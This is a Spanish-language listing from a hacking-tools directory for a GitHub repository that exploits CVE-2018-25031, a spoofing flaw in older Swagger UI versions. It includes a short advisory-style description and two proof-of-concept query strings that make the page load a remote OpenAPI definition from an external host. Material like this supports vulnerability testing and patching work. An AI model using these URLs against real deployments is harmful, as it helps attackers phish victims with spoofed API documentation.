Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/afine-com/cve-2018-25031
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebSeguridad de APIs
GitHubafine-com/cve-2018-25031

CVE-2018-25031

Archivos .json y .yaml utilizados para explotar CVE-2018-25031

Ver Repositorio
2112hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-25031

Descripción:

Swagger UI anterior a 4.1.3 podría permitir que un atacante remoto realice ataques de suplantación de identidad. Al persuadir a una víctima para que abra una URL manipulada, un atacante podría explotar esta vulnerabilidad para mostrar definiciones OpenAPI remotas.


Captura de pantalla antes del ataque:

PoC:

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

Captura de pantalla del PoC después del ataque:

Referencias:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

Probado en Swagger UI 3.52.1
Descargar herramienta